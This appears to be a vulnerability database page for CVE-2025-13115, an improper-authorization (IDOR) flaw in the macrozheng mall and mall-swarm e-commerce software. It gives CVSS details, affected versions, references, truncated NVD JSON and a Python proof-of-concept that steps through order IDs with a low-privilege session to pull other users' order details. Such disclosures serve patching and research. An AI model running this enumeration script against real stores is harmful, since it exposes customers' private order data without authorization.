CVE-2025-13115

Description

A security flaw has been discovered in macrozheng mall-swarm and mall up to 1.0.3. This impacts the function detail of the file /order/detail/ of the component Order Details Handler. Performing manipulation of the argument orderId results in improper authorization. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:macrozheng:mall:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:a:macrozheng:mall-swarm:*:*:*:*:*:*:*:* - VULNERABLE

macrozheng mall-swarm <= 1.0.3

macrozheng mall <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2025-13115 PoC - macrozheng mall IDOR Vulnerability
# Target: macrozheng mall-swarm / mall <= 1.0.3
# Vulnerability: Unauthorized access to order details via orderId parameter

TARGET_URL = "http://target-server/api/order/detail/"

def exploit_order_details(target_url, order_ids, cookies=None):
    """
    Exploit IDOR vulnerability to access unauthorized order details.
    Args:
        target_url: Base URL of the vulnerable application
        order_ids: List of order IDs to enumerate
        cookies: Authentication cookies (low-privilege user session)
    """
    results = []
    
    for order_id in order_ids:
        url = f"{target_url}{order_id}"
        try:
            response = requests.get(url, cookies=cookies, timeout=10)
            
            if response.status_code == 200:
                data = response.json()
                if data.get('code') == 200 or data.get('success'):
                    print(f"[!] Found accessible order: {order_id}")
                    print(f"    Order details: {data}")
                    results.append({
                        'order_id': order_id,
                        'details': data
                    })
        except Exception as e:
            print(f"[-] Error accessing order {order_id}: {e}")
    
    return results

if __name__ == "__main__":
    # Example: Enumerate order IDs 1-100
    order_ids = range(1, 101)
    cookies = {'JSESSIONID': 'your-low-privilege-session-id'}
    
    results = exploit_order_details(TARGET_URL, order_ids, cookies)
    print(f"\n[+] Total exposed orders: {len(results)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13115
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13115
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13115/
[4] VulDB https://vuldb.com/cve/CVE-2025-13115
[5] https://github.com/Hwwg/cve/issues/11
[6] https://github.com/Hwwg/cve/issues/6
[7] https://vuldb.com/?ctiid.332320
[8] https://vuldb.com/?id.332320
[9] https://vuldb.com/?submit.683222
[10] https://vuldb.com/?submit.686528
[11] https://github.com/Hwwg/cve/issues/6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13115", "sourceIdentifier": "[email protected]", "published": "2025-11-13T14:15:48.330", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in macrozheng mall-swarm and mall up to 1.0.3. This impacts the function detail of the file /order/detail/ of the component Order Details Handler. Performing manipulation of the argument orderId results in improper authorization. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:macrozheng:mall:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.3", "matchCriteriaId": "3962F288-B38B-436C-BE79-91257EF7680D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:macrozheng:mall-swarm:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.0.3", "matchCriteriaId": "70E50D07-20AC-4613-9602-2B82606850E6"}]}]}], "references": [{"url": "https://github.com/Hwwg/cve/issues/11", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://github.com/Hwwg/cve/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332320", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332320", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.683222", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://v ... (truncated)